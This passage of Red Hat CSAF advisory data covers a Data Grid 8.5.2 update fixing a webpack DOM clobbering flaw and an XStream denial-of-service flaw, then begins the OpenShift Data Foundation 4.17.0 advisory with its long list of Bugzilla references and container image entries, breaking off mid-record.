License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:10214", url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index", url: "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/index", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2324606", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2324606", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10214.json", }, ], title: "Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update", tracking: { current_release_date: "2025-04-09T20:59:37+00:00", generator: { date: "2025-04-09T20:59:37+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:10214", initial_release_date: "2024-11-25T16:56:04+00:00", revision_history: [ { date: "2024-11-25T16:56:04+00:00", number: "1", summary: "Initial version", }, { date: "2024-11-25T16:56:04+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-09T20:59:37+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat Data Grid", product: { name: "Red Hat Data Grid", product_id: "Red Hat Data Grid", product_identification_helper: { cpe: "cpe:/a:redhat:jboss_data_grid:8", }, }, }, ], category: "product_family", name: "Red Hat JBoss Data Grid", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "Red Hat Data Grid", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-11-25T16:56:04+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "Red Hat Data Grid", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "Red Hat Data Grid", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "Red Hat Data Grid", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-47072", cwe: { id: "CWE-502", name: "Deserialization of Untrusted Data", }, discovery_date: "2024-11-08T13:47:39.374198+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2324606", }, ], notes: [ { category: "description", text: "A flaw was found in the XStream library. A remote attacker may trigger a denial of service by manipulating the processed input stream when XStream is configured to use the BinaryStreamDriver. This issue may lead to the termination of the application.", title: "Vulnerability description", }, { category: "summary", text: "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in XStream is considered an Important severity rather than Moderate because it exposes applications to a denial of service (DoS) attack with relative ease. By exploiting the flaw in the `BinaryStreamDriver`, an attacker can manipulate the binary input stream to trigger a stack overflow, which terminates the application unexpectedly. Unlike moderate vulnerabilities, which may require specific conditions or limited privileges, this flaw enables remote attackers to forcefully terminate services by crafting malicious input, impacting system availability. Additionally, the vulnerability’s reliance on a common serialization mechanism elevates the risk, as it may affect applications across various environments and industries where XStream is deployed.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "Red Hat Data Grid", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-47072", }, { category: "external", summary: "RHBZ#2324606", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2324606", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-47072", url: "https://www.cve.org/CVERecord?id=CVE-2024-47072", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-47072", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-47072", }, { category: "external", summary: "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266", url: "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266", }, { category: "external", summary: "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q", url: "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q", }, { category: "external", summary: "https://x-stream.github.io/CVE-2024-47072.html", url: "https://x-stream.github.io/CVE-2024-47072.html", }, ], release_date: "2024-11-07T23:38:52.978000+00:00", remediations: [ { category: "vendor_fix", date: "2024-11-25T16:56:04+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "Red Hat Data Grid", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "Red Hat Data Grid", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "Red Hat Data Grid", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream", }, ], }
rhsa-2024:8676
Vulnerability from csaf_redhat
Published
2024-10-30 14:25
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update
Notes
Topic
Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.
These updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:
https://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index
All Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.\n\nThese updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index\n\nAll Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:8676", url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2059669", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2059669", }, { category: "external", summary: "2190161", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2190161", }, { category: "external", summary: "2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "2241329", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2241329", }, { category: "external", summary: "2245068", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2245068", }, { category: "external", summary: "2250364", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2250364", }, { category: "external", summary: "2253013", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2253013", }, { category: "external", summary: "2257271", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2257271", }, { category: "external", summary: "2259668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259668", }, { category: "external", summary: "2262777", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2262777", }, { category: "external", summary: "2268046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268046", }, { category: "external", summary: "2268820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2268820", }, { category: "external", summary: "2271773", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2271773", }, { category: "external", summary: "2272597", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272597", }, { category: "external", summary: "2275225", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2275225", }, { category: "external", summary: "2275965", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2275965", }, { category: "external", summary: "2276393", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276393", }, { category: "external", summary: "2276672", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276672", }, { category: "external", summary: "2279751", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2279751", }, { category: "external", summary: "2279876", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2279876", }, { category: "external", summary: "2280308", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280308", }, { category: "external", summary: "2280608", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280608", }, { category: "external", summary: "2280637", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2280637", }, { category: "external", summary: "2283994", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283994", }, { category: "external", summary: "2292435", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292435", }, { category: "external", summary: "2292668", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292668", }, { category: "external", summary: "2294234", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2294234", }, { category: "external", summary: "2294723", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2294723", }, { category: "external", summary: "2297265", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297265", }, { category: "external", summary: "2297295", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297295", }, { category: "external", summary: "2297447", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297447", }, { category: "external", summary: "2297454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297454", }, { category: "external", summary: "2299630", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2299630", }, { category: "external", summary: "2299639", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2299639", }, { category: "external", summary: "2300021", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300021", }, { category: "external", summary: "2300312", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300312", }, { category: "external", summary: "2300331", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300331", }, { category: "external", summary: "2300499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300499", }, { category: "external", summary: "2301889", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301889", }, { category: "external", summary: "2302201", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302201", }, { category: "external", summary: "2302257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302257", }, { category: "external", summary: "2302448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302448", }, { category: "external", summary: "2302507", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302507", }, { category: "external", summary: "2302575", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302575", }, { category: "external", summary: "2302774", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302774", }, { category: "external", summary: "2302841", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302841", }, { category: "external", summary: "2302842", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302842", }, { category: "external", summary: "2303028", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303028", }, { category: "external", summary: "2303342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303342", }, { category: "external", summary: "2303403", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303403", }, { category: "external", summary: "2303619", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303619", }, { category: "external", summary: "2303820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303820", }, { category: "external", summary: "2303821", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303821", }, { category: "external", summary: "2303822", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303822", }, { category: "external", summary: "2303823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303823", }, { category: "external", summary: "2303824", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303824", }, { category: "external", summary: "2303825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303825", }, { category: "external", summary: "2303829", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303829", }, { category: "external", summary: "2304073", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304073", }, { category: "external", summary: "2304231", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304231", }, { category: "external", summary: "2304232", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304232", }, { category: "external", summary: "2304235", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304235", }, { category: "external", summary: "2304238", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304238", }, { category: "external", summary: "2304799", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304799", }, { category: "external", summary: "2304810", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304810", }, { category: "external", summary: "2304815", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304815", }, { category: "external", summary: "2304993", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304993", }, { category: "external", summary: "2305274", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305274", }, { category: "external", summary: "2305295", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305295", }, { category: "external", summary: "2305660", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305660", }, { category: "external", summary: "2305880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305880", }, { category: "external", summary: "2306026", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306026", }, { category: "external", summary: "2306387", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306387", }, { category: "external", summary: "2306577", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306577", }, { category: "external", summary: "2307823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307823", }, { category: "external", summary: "2307835", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307835", }, { category: "external", summary: "2307909", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307909", }, { category: "external", summary: "2308091", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308091", }, { category: "external", summary: "2308101", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308101", }, { category: "external", summary: "2308144", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308144", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2308304", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308304", }, { category: "external", summary: "2308442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308442", }, { category: "external", summary: "2308446", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308446", }, { category: "external", summary: "2309191", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309191", }, { category: "external", summary: "2309195", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309195", }, { category: "external", summary: "2309485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309485", }, { category: "external", summary: "2309486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309486", }, { category: "external", summary: "2309487", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309487", }, { category: "external", summary: "2309488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309488", }, { category: "external", summary: "2309489", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309489", }, { category: "external", summary: "2309700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309700", }, { category: "external", summary: "2310369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310369", }, { category: "external", summary: "2310385", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310385", }, { category: "external", summary: "2310841", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310841", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311042", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311042", }, { category: "external", summary: "2311043", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311043", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2311468", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311468", }, { category: "external", summary: "2311551", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311551", }, { category: "external", summary: "2311790", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311790", }, { category: "external", summary: "2311867", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311867", }, { category: "external", summary: "2311885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311885", }, { category: "external", summary: "2311893", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311893", }, { category: "external", summary: "2312137", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312137", }, { category: "external", summary: "2312442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312442", }, { category: "external", summary: "2313178", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313178", }, { category: "external", summary: "2313203", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313203", }, { category: "external", summary: "2313515", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313515", }, { category: "external", summary: "2313717", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313717", }, { category: "external", summary: "2313736", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313736", }, { category: "external", summary: "2314200", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314200", }, { category: "external", summary: "2314211", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314211", }, { category: "external", summary: "2314404", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314404", }, { category: "external", summary: "2314454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314454", }, { category: "external", summary: "2314636", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314636", }, { category: "external", summary: "2315624", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315624", }, { category: "external", summary: "2315651", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315651", }, { category: "external", summary: "2315666", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315666", }, { category: "external", summary: "2315709", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315709", }, { category: "external", summary: "2315733", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315733", }, { category: "external", summary: "2315846", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315846", }, { category: "external", summary: "2318490", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2318490", }, { category: "external", summary: "2319102", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2319102", }, { category: "external", summary: "2319238", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2319238", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8676.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update", tracking: { current_release_date: "2025-04-10T00:21:32+00:00", generator: { date: "2025-04-10T00:21:32+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8676", initial_release_date: "2024-10-30T14:25:22+00:00", revision_history: [ { date: "2024-10-30T14:25:22+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-30T14:25:22+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:32+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHODF 4.17 for RHEL 9", product: { name: "RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_data_foundation:4.17::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Data Foundation", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product: { name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product_id: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product: { name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product_id: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product: { name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product_id: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product: { name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product_id: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product: { name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product_id: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product: { name: 